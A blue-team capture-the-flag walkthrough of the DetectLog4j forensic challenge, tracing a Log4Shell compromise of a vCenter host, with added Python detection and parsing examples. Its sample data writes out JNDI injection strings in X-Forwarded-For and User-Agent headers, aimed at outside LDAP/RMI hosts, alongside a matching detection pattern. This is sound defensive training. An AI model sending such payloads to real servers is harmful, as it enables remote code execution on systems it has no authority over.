# DetectLog4j

{% embed url="<https://cyberdefenders.org/blueteam-ctf-challenges/86#nav-overview>" %}

## Q1 What is the computer hostname?

For this challenge, I will use Autopsy and FTK Imager.

Go to Operating System Information and you will see the hostname in the right panel *<mark style="color:green;">(note that your result may differ slightly from mine, as the image was still loading)</mark>*

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FiUWX7qqpiVTr0FY7edrf%2Fimage.png?alt=media&#x26;token=7da53651-1604-44cd-ab2e-64107082b340" alt=""><figcaption></figcaption></figure>

**Answer: vcw65**

## Q2 What is the Timezone of the compromised machine?

We need to open the SYSTEM hive to find the timezone.

It is at the path Windows\System32\config; the SYSTEM file appears in the right panel.

We will browse with FTK Imager this time, until Autopsy finishes loading the image.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FChqFy1Vys7GVA9ttL4Cf%2Fimage.png?alt=media&#x26;token=7de7804a-4627-4579-83b7-e713b78546b4" alt=""><figcaption></figcaption></figure>

Export the file, then load the hive with Registry Editor.

Go to the key system\ControlSet001\Control\TimeZoneInformation to find the timezone.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FohH0HCAxYHaO7Ha87tkL%2Fimage.png?alt=media&#x26;token=7057e815-05a7-4af4-9d43-ce41991df5ab" alt=""><figcaption></figcaption></figure>

The time zone is Pacific Standard Time; a quick Google search gives its UTC offset.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FiJ7p3NOAR6t9a6Ob6aD3%2Fimage.png?alt=media&#x26;token=6e3df1fa-02cc-47a2-a4d6-69987f9b8ea2" alt=""><figcaption></figcaption></figure>

**Answer: UTC-8**

## Q3 What is the current build number on the system?

From the same path as in Q2 in FTK Imager, scroll down to the SOFTWARE file and export it.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2Fvs0yOR3OPJfdBwN5WGNn%2Fimage.png?alt=media&#x26;token=c3fb5b93-9808-41a5-96f5-79751031aa3e" alt=""><figcaption></figcaption></figure>

Load the hive with Registry Editor and go to the key software\Microsoft\Windows NT\CurrentVersion.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2Fbb7mD2eviAw18SA7XTr4%2Fimage.png?alt=media&#x26;token=270dc6c3-f939-4605-a846-e1d3b7dea4a6" alt=""><figcaption></figcaption></figure>

**Answer: 14393**

## Q4 What is the computer IP?

In Registry Editor, go to the key `system\ControlSet001\Services\Tcpip\Parameters\Interfaces\{82e90056-fd8d-4a24-913a-fc46f535fddf}`.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2F9c9DzSFMreCQHXbmddDj%2Fimage.png?alt=media&#x26;token=0b0a8d86-1c82-4a9b-84b2-edfaa99eacb8" alt=""><figcaption></figcaption></figure>

**Answer: 192.168.112.139**

## Q5 What is the domain the computer was assigned to?

In Registry Editor, go to the key system\ControlSet001\Services\Tcpip\Parameters.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2Ftixbuv2XdnjymWTFhKg1%2Fimage.png?alt=media&#x26;token=6f0561af-3714-4875-aa91-030db5e6befe" alt=""><figcaption></figcaption></figure>

**Answer: cyberdefenders.org**

## Q6 When was myoussef user created?

Now we use Autopsy's "Account" panel to find the creation time of the mentioned user.

![](https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FQeyiPE80U0kdYUaLP4fS%2Fimage.png?alt=media\&token=2d3e452a-49f0-4477-9194-50d21c1bf6d8)

**Answer: 2021-12-28 06:57:23 utc**

## Q7 What is the user mhasan password hint?

From the same "Account" panel as in Q6:

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FpVXKkNKy69PSiJZ4UagT%2Fimage.png?alt=media&#x26;token=e91caea3-a2db-4003-881d-baa04893694b" alt=""><figcaption></figcaption></figure>

**Answer: <https://www.linkedin.com/in/0xmohamedhasan/>**

## Q8 What is the version of the VMware product installed on the machine?

In Registry Editor, go to the key software\VMware, Inc.\apacheTomcat.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2Fd1NewhGUuGlUpH1bvltD%2Fimage.png?alt=media&#x26;token=acbb98c9-d8c8-4a76-9a3b-d8f4e95a6e1c" alt=""><figcaption></figcaption></figure>

<mark style="color:red;">**Another way**</mark> **using Autopsy:** from the Installed Programs view:

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2Fud1wDdUROOVgCuzBMgPL%2Fimage.png?alt=media&#x26;token=de53f91e-5721-4c42-be57-b60ca3d9c0ab" alt=""><figcaption></figcaption></figure>

**Answer: 6.7.0.40322**

## Q9 What is the version of the log4j library used by the installed VMware product?

Actually, I didn't know how to find the library path, so I tried searching for it by name using Autopsy and, fortunately, I found it.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2F111K2KBmmBt1jN38NS3a%2Fimage.png?alt=media&#x26;token=fea3b68b-4048-40a1-a886-ecae48a03f91" alt=""><figcaption></figcaption></figure>

**Answer: 2.11.2**

## Q10 What is the log4j library log level specified in the configuration file?

Search for log4j.properties and read the files until you find the log level setting.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FeCJGOWwlUiEqAFieXowj%2Fimage.png?alt=media&#x26;token=2e24c5e2-8263-4eab-87ce-301732e4f180" alt=""><figcaption></figcaption></figure>

**Answer: INFO**

## Q11 The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?

A Google search shows that the header is *x-forwarded-for*.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FXXgmUO66TqxNGCHTZHKG%2Fimage.png?alt=media&#x26;token=2bac53d5-7d99-418e-a9b6-18fac26aabfe" alt=""><figcaption><p><a href="https://thestack.technology/vmware-log4j-exposure-attack-log4shell/">https://thestack.technology/vmware-log4j-exposure-attack-log4shell/</a></p></figcaption></figure>

**Answer: x-forwarded-for**

## Q12 The attacker used the log4shell.huntress.com payload to detect if the vCenter instance is vulnerable. What is the first link of the log4huntress payload?

In Autopsy, search for log4shell.huntress.com and export the log file.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2F7tyZDsRlQswvJfpL2y4N%2Fimage.png?alt=media&#x26;token=da2c5bb6-4a8d-4124-ac6e-3084b9fb9387" alt=""><figcaption></figcaption></figure>

**Answer: log4shell.huntress.com:1389/b1292f3c-a652-4240-8fb4-59c43141f55a**
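The header injection from Q11 and the callback string from Q12 can be pulled out of request records programmatically rather than by keyword search. The following is an added example written for this write-up, not the author's procedure; the request records are constructed, with the huntress target taken from the answer above and a second probe using a documentation-range address.

```python
"""Flag Log4Shell-style JNDI lookup strings in request headers and extract the
callback endpoint. Added example for this write-up (not from the original
page); SAMPLE_REQUESTS are constructed records, not real log data."""
import re
from typing import Dict, List, Optional

# ${jndi:<scheme>:<target>} -- case-insensitive and tolerant of whitespace padding.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:/*(?P<target>[^}]*)\}", re.IGNORECASE)

# Header values that commonly reach a log4j logger; X-Forwarded-For is the one
# the write-up identifies for the vCenter login request.
WATCHED_HEADERS = {"x-forwarded-for", "user-agent", "referer",
                   "x-api-version", "authorization"}


def find_jndi(headers: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return details of the first JNDI lookup in a watched header, or None."""
    for name, value in headers.items():
        if name.lower() not in WATCHED_HEADERS:
            continue
        m = JNDI_RE.search(value)
        if m:
            return {"header": name,
                    "scheme": m.group("scheme").lower(),
                    "target": m.group("target").strip()}
    return None


def callback_host(target: str) -> str:
    """Strip the path from a JNDI target, leaving the host:port the victim would contact."""
    return target.split("/", 1)[0]


def scan_requests(requests: List[Dict]) -> List[Dict]:
    """Run find_jndi over request records and enrich each hit with source and callback."""
    hits = []
    for req in requests:
        hit = find_jndi(req["headers"])
        if hit is None:
            continue
        hit.update(path=req["path"], client=req["client"],
                   callback=callback_host(hit["target"]))
        hits.append(hit)
    return hits


# Constructed sample records. The first X-Forwarded-For value is the probe the
# write-up recovered; the third uses a documentation-range IP (RFC 5737).
SAMPLE_REQUESTS = [
    {"client": "192.168.112.128", "path": "/ui/login", "headers": {
        "Host": "vcenter.example",
        "X-Forwarded-For": "${jndi:ldap://log4shell.huntress.com:1389/b1292f3c-a652-4240-8fb4-59c43141f55a}"}},
    {"client": "192.168.112.139", "path": "/ui/login", "headers": {
        "Host": "vcenter.example", "X-Forwarded-For": "192.168.112.139"}},
    {"client": "192.168.112.128", "path": "/ui/login", "headers": {
        "Host": "vcenter.example", "User-Agent": "${JNDI:RMI://203.0.113.10:1099/x}"}},
]

if __name__ == "__main__":
    for h in scan_requests(SAMPLE_REQUESTS):
        print(f"{h['client']} -> {h['header']}: {h['scheme']} callback {h['callback']}")
```

The callback value is what an analyst would pivot on next: egress logs for that host and port tell you whether the lookup actually resolved, which is the difference between a probe and a compromise.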

## Q13 When was the first successful login to vSphere WebClient?

Search for audit\_events in Autopsy, or go to the path ProgramData\VMware\vCenterServer\runtime\VMwareSTSService\logs,

then find the earliest LoginSuccess event.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FZoBquj7bb8srh30T0Z3K%2Fimage.png?alt=media&#x26;token=28e3a8cb-5d04-475b-934b-3947f30b2e81" alt=""><figcaption></figcaption></figure>

**Answer: 28/12/2021 20:39:29 UTC**

## Q14 What is the attacker's IP address?

From the same events, we can see that the IP 192.168.112.128 tried many times to log in.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2F4vYRZRVvw0gdrycEXku4%2Fimage.png?alt=media&#x26;token=54880660-07be-4546-9604-30b5eec13d7c" alt=""><figcaption></figcaption></figure>

**Answer: 192.168.112.128**
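An added example for Q13 and Q14, not from the write-up: instead of reading audit\_events by eye, parse the login events, take the earliest LoginSuccess, and flag sources that failed repeatedly before succeeding. The log layout below is constructed for the example and is not the real vCenter STS audit\_events.log format, so LINE_RE needs adapting to the real file.

```python
"""Parse login audit events: earliest successful login, failures per source
address, and sources that brute-forced their way in. Added example for this
write-up; SAMPLE_LOG is a constructed layout, not the real STS audit format."""
import re
from collections import Counter
from datetime import datetime, timezone
from typing import Dict, List, Optional

# One event per line: <ISO timestamp> <LoginSuccess|LoginFailure> user=<x> client=<ip>
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<event>Login\w+)\s+user=(?P<user>\S+)\s+client=(?P<ip>\S+)\s*$")

# Constructed sample. One line is deliberately out of chronological order.
SAMPLE_LOG = """\
2021-12-28T20:31:07Z LoginFailure user=administrator@vsphere.local client=192.168.112.128
2021-12-28T20:31:09Z LoginFailure user=administrator@vsphere.local client=192.168.112.128
2021-12-28T20:31:12Z LoginFailure user=root@vsphere.local client=192.168.112.128
2021-12-28T20:39:29Z LoginSuccess user=administrator@vsphere.local client=192.168.112.128
2021-12-28T21:02:44Z LoginSuccess user=administrator@vsphere.local client=192.168.112.139
2021-12-28T20:38:55Z LoginFailure user=administrator@vsphere.local client=192.168.112.128
2021-12-28T20:50:00Z LoginFailure user=administrator@vsphere.local client=192.168.112.140
"""


def parse(text: str) -> List[Dict]:
    """Parse matching lines into dicts and sort them by timestamp (file order is not reliable)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append({"ts": ts, "event": m["event"], "user": m["user"], "ip": m["ip"]})
    return sorted(events, key=lambda e: e["ts"])


def first_success(text: str) -> Optional[datetime]:
    """Earliest LoginSuccess, or None if there is none."""
    for e in parse(text):
        if e["event"] == "LoginSuccess":
            return e["ts"]
    return None


def failures_by_ip(text: str) -> Counter:
    return Counter(e["ip"] for e in parse(text) if e["event"] == "LoginFailure")


def brute_force_candidates(text: str, threshold: int = 3) -> List[str]:
    """IPs with at least `threshold` failures followed by a later success."""
    events = parse(text)
    out = []
    for ip, n in failures_by_ip(text).items():
        if n < threshold:
            continue
        fails = [e["ts"] for e in events if e["ip"] == ip and e["event"] == "LoginFailure"]
        succ = [e["ts"] for e in events if e["ip"] == ip and e["event"] == "LoginSuccess"]
        if any(s > fails[threshold - 1] for s in succ):
            out.append(ip)
    return sorted(out)


def fmt(ts: datetime) -> str:
    """Render in the DD/MM/YYYY HH:MM:SS UTC form used for the answer above."""
    return ts.astimezone(timezone.utc).strftime("%d/%m/%Y %H:%M:%S UTC")


if __name__ == "__main__":
    print("first success:", fmt(first_success(SAMPLE_LOG)))
    print("failures:", dict(failures_by_ip(SAMPLE_LOG)))
    print("brute-force candidates:", brute_force_candidates(SAMPLE_LOG))
```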

## Q15 What is the port the attacker used to receive the Cobalt Strike reverse shell?

Search for the PowerShell operational event log, named **Microsoft-Windows-PowerShell%4Operational.evtx**,

then search inside it for BASE64 content.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FXKvGIjLFgBKTl7EoZu1C%2Fimage.png?alt=media&#x26;token=15612088-54f8-43b3-ad82-e7daebe6c306" alt=""><figcaption></figcaption></figure>

Using CyberChef, decode with From Base64 and then Gunzip.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FPHpWCzt2qK9bXt3fDgew%2Fimage.png?alt=media&#x26;token=88fd503a-4421-4e3e-9c6b-571db6c2e00d" alt=""><figcaption></figcaption></figure>

Execute the decoded code under FakeNet, then analyze the captured traffic with Wireshark.

**Answer: 1337**
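The CyberChef recipe above (From Base64, then Gunzip) as an added Python example that also handles the UTF-16LE encoding PowerShell's -EncodedCommand uses and lists the TCP ports the decoded script references. This is not the write-up's own code, and the embedded script is a constructed, harmless stand-in rather than the real payload.

```python
"""Decode a base64(+gzip) PowerShell payload recovered from the PowerShell
operational event log and list the ports it references. Added example for
this write-up; SAMPLE_SCRIPT is a constructed stand-in, not the real payload."""
import base64
import gzip
import re
from typing import Dict, List

# "port" followed (within a few non-digit chars) by a number, and ip:port / ip,port pairs.
PORT_RE = re.compile(r"(?i)\bport\b\D{0,5}?(\d{1,5})")
IPPORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\s*[,:]\s*(\d{1,5})\b")


def looks_utf16le(raw: bytes) -> bool:
    """-EncodedCommand payloads are UTF-16LE: ASCII text shows a zero in every odd byte."""
    return len(raw) >= 8 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1:16:2])


def decode_blob(b64: str) -> str:
    """Base64-decode, gunzip if the gzip magic is present, then pick the text encoding."""
    raw = base64.b64decode("".join(b64.split()))   # tolerate line-wrapped log text
    if raw[:2] == b"\x1f\x8b":                     # gzip magic bytes
        raw = gzip.decompress(raw)
    return raw.decode("utf-16le" if looks_utf16le(raw) else "utf-8", "replace")


def extract_ports(script: str) -> List[int]:
    ports = {int(p) for p in PORT_RE.findall(script)}
    ports |= {int(p) for _, p in IPPORT_RE.findall(script)}
    return sorted(p for p in ports if 1 <= p <= 65535)


def analyze(b64: str) -> Dict[str, object]:
    """Decode the blob and summarise the network endpoints it mentions."""
    script = decode_blob(b64)
    return {"script": script,
            "ports": extract_ports(script),
            "ips": sorted({ip for ip, _ in IPPORT_RE.findall(script)})}


# Constructed, harmless stand-in for the recovered script (it only prints).
SAMPLE_SCRIPT = (
    '# constructed stand-in for the recovered script\n'
    '$endpoint = "192.168.112.128:1337"\n'
    '$port = 1337\n'
    'Write-Host "would connect to $endpoint"\n'
)
# Same packaging as the logged payload: gzip, then base64.
SAMPLE_BLOB = base64.b64encode(gzip.compress(SAMPLE_SCRIPT.encode("utf-8"))).decode("ascii")
# And the -EncodedCommand style, for comparison: UTF-16LE, then base64.
SAMPLE_ENCODED_COMMAND = base64.b64encode(
    'Write-Host "utf-16 sample"'.encode("utf-16le")).decode("ascii")

if __name__ == "__main__":
    result = analyze(SAMPLE_BLOB)
    print(result["script"])
    print("ports:", result["ports"], "ips:", result["ips"])
```

Decoding the script statically tells you the endpoint without detonating anything; running it under FakeNet, as above, confirms the behaviour and catches endpoints that are built at runtime rather than written as literals.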

## Q16 What is the script name published by VMware to mitigate log4shell vulnerability?

Google it:

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FUgZCHx0i8yziQuqVkEFL%2Fimage.png?alt=media&#x26;token=5073f0fe-4f9b-471c-81a9-b5c27106c7e4" alt=""><figcaption></figcaption></figure>

**Answer: vc\_log4j\_mitigator.py**

## Q17 In some cases, you may not be able to update the products used in your network. What is the system property needed to set to 'true' to work around the log4shell vulnerability?

Again, Google it, then try both candidates:

the `log4j2.formatMsgNoLookups` system property or the `LOG4J_FORMAT_MSG_NO_LOOKUPS` environment variable.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2Fy9xlrc9vbIW9UlYplH9c%2Fimage.png?alt=media&#x26;token=702bd228-f766-48bc-9262-17f23e4a3c92" alt=""><figcaption></figcaption></figure>

**Answer: log4j2.formatMsgNoLookups**

## Q18 What is the log4j version which contains a patch to CVE-2021-44228?

Search for the CVE-2021-44228 patch.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2F5FflzI0CapmVMNqkBx7e%2Fimage.png?alt=media&#x26;token=00e7e804-6d90-46e2-8061-e4b0c64a1e1e" alt=""><figcaption></figcaption></figure>

**Answer: 2.15.0**

## Q19 Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the *JNDILookup.class*?

Search for *JNDILookup.class* and export the archive that contains it,

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FsnxGAw5imQrnLJNzLifV%2Fimage.png?alt=media&#x26;token=d61717bb-6ef4-464d-b235-8907b80b71ef" alt=""><figcaption></figcaption></figure>

then extract the archive and search for *JNDILookup.class*.

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FVVj4BkGEk1pwH79MOmAy%2Fimage.png?alt=media&#x26;token=d122b571-861b-4e2c-a4b5-46917e81163b" alt=""><figcaption></figcaption></figure>

Using HashMyFiles, compute the SHA-256:

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FmK8Wr1yWpayj3ZbxUt38%2Fimage.png?alt=media&#x26;token=d5c78329-7255-4b92-926e-0363874886f3" alt=""><figcaption></figcaption></figure>

**Answer: 0f038a1e0aa0aff76d66d1440c88a2b35a3d023ad8b2e3bac8e25a3208499f7e**
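Added example for Q9 and Q19, not the write-up's own procedure (which used Autopsy and HashMyFiles): walk a directory for jar/war/ear archives, read the manifest Implementation-Version, locate JndiLookup.class including inside nested jars, and report its SHA-256. The sample archives are built in a temporary directory and the class bytes are a placeholder, so the hash this prints is not the one in the answer above; the version string and jar name are taken from Q9.

```python
"""Scan a directory tree for JndiLookup.class inside jar/war/ear archives,
including archives nested in archives, reporting manifest version and SHA-256.
Added example for this write-up; make_sample_tree() builds constructed archives."""
import hashlib
import io
import os
import tempfile
import zipfile
from typing import Dict, List

TARGET = "/jndilookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Placeholder bytes standing in for the real class (constructed, not a real class file).
SAMPLE_CLASS_BYTES = b"\xca\xfe\xba\xbe constructed placeholder, not a real class"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def manifest_version(zf: zipfile.ZipFile) -> str:
    """Implementation-Version from META-INF/MANIFEST.MF, or 'unknown'."""
    try:
        text = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return "unknown"
    for line in text.splitlines():
        if line.lower().startswith("implementation-version:"):
            return line.split(":", 1)[1].strip()
    return "unknown"


def scan_archive(data: bytes, label: str, findings: List[Dict]) -> None:
    """Inspect one archive held in memory; recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        version = manifest_version(zf)
        for name in zf.namelist():
            lower = name.lower()
            if lower.endswith(TARGET):
                findings.append({"archive": label, "entry": name, "version": version,
                                 "sha256": sha256_hex(zf.read(name))})
            elif lower.endswith(ARCHIVE_EXT):
                scan_archive(zf.read(name), f"{label}!{name}", findings)


def scan_path(root: str) -> List[Dict]:
    findings: List[Dict] = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, findings)
    return findings


def make_sample_tree() -> str:
    """Build a temp dir with a log4j-style jar, a war nesting that jar, and a clean jar."""
    root = tempfile.mkdtemp(prefix="log4jscan-")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\nImplementation-Version: 2.11.2\n")
        zf.writestr("org/apache/logging/log4j/core/lookup/JndiLookup.class", SAMPLE_CLASS_BYTES)
    jar_bytes = buf.getvalue()
    with open(os.path.join(root, "log4j-core-2.11.2.jar"), "wb") as fh:
        fh.write(jar_bytes)
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.11.2.jar", jar_bytes)   # nested case
    with zipfile.ZipFile(os.path.join(root, "clean.jar"), "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return root


if __name__ == "__main__":
    for f in scan_path(make_sample_tree()):
        print(f"{f['archive']}  version={f['version']}  sha256={f['sha256']}")
```

The nested case matters in practice: vCenter and most Java applications ship log4j inside war or ear bundles, so a scanner that only looks at top-level jar files misses them.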

## Q20 Analyze JNDILookup.class. What is the value stored in the CONTAINER\_JNDI\_RESOURCE\_PATH\_PREFIX variable?

In Autopsy, search for "CONTAINER\_JNDI\_RESOURCE\_PATH\_PREFIX".

![](https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FoaYfUuUi7WCljNO1caG4%2Fimage.png?alt=media\&token=bf5cc34f-0d81-44d0-853e-db71e1085662)

**Answer: java: comp/env/**
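Added example for Q20, not from the write-up: the Autopsy keyword hit works because the field name and its value are both stored as constant-pool entries in the class file. This parser walks the constant pool and field table of a .class file and maps each static field carrying a ConstantValue attribute to its String. The class file it reads is constructed in memory (it is not the real JndiLookup.class) and embeds the value log4j's JndiLookup defines for that constant, java:comp/env/.

```python
"""Extract static String constants from a Java .class file by parsing its
constant pool and field table. Added example for this write-up; the class
file is constructed in memory by build_sample_class()."""
import struct
from typing import Dict, List, Tuple

MAGIC = b"\xca\xfe\xba\xbe"
# Payload sizes (bytes after the tag) for fixed-width constant pool entries.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def u2(data: bytes, off: int) -> int:
    return struct.unpack_from(">H", data, off)[0]


def read_pool(data: bytes) -> Tuple[Dict[int, tuple], int]:
    """Return {index: (tag, payload)} and the offset just past the constant pool."""
    if data[:4] != MAGIC:
        raise ValueError("not a Java class file")
    count = u2(data, 8)
    pool, off, idx = {}, 10, 1
    while idx < count:
        tag = data[off]
        off += 1
        if tag == 1:                                  # CONSTANT_Utf8: u2 length + bytes
            length = u2(data, off)
            off += 2
            pool[idx] = (tag, data[off:off + length].decode("utf-8", "replace"))
            off += length
        elif tag in FIXED:
            pool[idx] = (tag, data[off:off + FIXED[tag]])
            off += FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {off - 1}")
        idx += 2 if tag in (5, 6) else 1              # Long and Double take two slots
    return pool, off


def utf8(pool: Dict[int, tuple], idx: int) -> str:
    tag, payload = pool[idx]
    if tag != 1:
        raise ValueError(f"constant #{idx} is not Utf8")
    return payload


def utf8_constants(data: bytes) -> List[str]:
    """Every Utf8 entry: what a keyword search over the raw class file would hit."""
    pool, _ = read_pool(data)
    return [p for tag, p in pool.values() if tag == 1]


def static_string_fields(data: bytes) -> Dict[str, str]:
    """Map field name -> String value for fields with a ConstantValue attribute."""
    pool, off = read_pool(data)
    off += 6                          # access_flags, this_class, super_class
    off += 2 + 2 * u2(data, off)      # interfaces_count + interfaces
    fields_count = u2(data, off)
    off += 2
    result = {}
    for _ in range(fields_count):
        name = utf8(pool, u2(data, off + 2))
        attr_count = u2(data, off + 6)
        off += 8                      # access_flags, name, descriptor, attributes_count
        for _ in range(attr_count):
            attr_name = utf8(pool, u2(data, off))
            attr_len = struct.unpack_from(">I", data, off + 2)[0]
            if attr_name == "ConstantValue":
                tag, payload = pool[u2(data, off + 6)]
                if tag == 8:          # CONSTANT_String -> Utf8 index
                    result[name] = utf8(pool, u2(payload, 0))
            off += 6 + attr_len
    return result


def build_sample_class() -> bytes:
    """Constructed minimal class with one public static final String field."""
    cp = [(1, b"CONTAINER_JNDI_RESOURCE_PATH_PREFIX"),  # 1
          (1, b"Ljava/lang/String;"),                   # 2
          (1, b"java:comp/env/"),                       # 3
          (8, struct.pack(">H", 3)),                    # 4 String -> #3
          (1, b"ConstantValue"),                        # 5
          (1, b"Sample"), (7, struct.pack(">H", 6)),    # 6, 7 this class
          (1, b"java/lang/Object"), (7, struct.pack(">H", 8))]  # 8, 9 super class
    out = bytearray(MAGIC + struct.pack(">HHH", 0, 52, len(cp) + 1))
    for tag, payload in cp:
        out.append(tag)
        if tag == 1:
            out += struct.pack(">H", len(payload))
        out += payload
    out += struct.pack(">HHHH", 0x0021, 7, 9, 0)      # flags, this, super, interfaces_count
    out += struct.pack(">H", 1)                       # fields_count
    out += struct.pack(">HHHH", 0x0019, 1, 2, 1)      # public static final, name, desc, 1 attr
    out += struct.pack(">HIH", 5, 2, 4)               # ConstantValue(len 2) -> String #4
    out += struct.pack(">HH", 0, 0)                   # methods_count, attributes_count
    return bytes(out)


if __name__ == "__main__":
    print(static_string_fields(build_sample_class()))
```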

## Q21 What is the executable used by the attacker to gain persistence?

To find that, we need to look for any startup program or executable.

Search the user's profile for NTUSER.DAT;

we find it at the path root\Users\Administrator.WIN-B633EO9K91M\NTUSER.DAT

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2F1csBjsTj0FQFcf3QPYZh%2Fimage.png?alt=media&#x26;token=5a26d18c-cb4c-4d59-b72e-6f62050f7c22" alt=""><figcaption></figcaption></figure>

Export the file and load the hive with Registry Editor.

Finally, search for any key named "Run"; we find the entry under "RunOnce".

<figure><img src="https://3554695797-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkZ2jQy5PAQnYRhE2XnB%2Fuploads%2FLFSzm5OSiH68ByJIXjBC%2Fimage.png?alt=media&#x26;token=d99c76c4-dcbb-4dd1-9e0b-dcbc84e1ddb6" alt=""><figcaption></figcaption></figure>

**Answer: baaaackdooor.exe**

## Q22 When was the first submission of the ransomware to VirusTotal?

After many searches, I found that the first ransomware submitted is "khonsari.exe".

Then I searched for its analysis report.

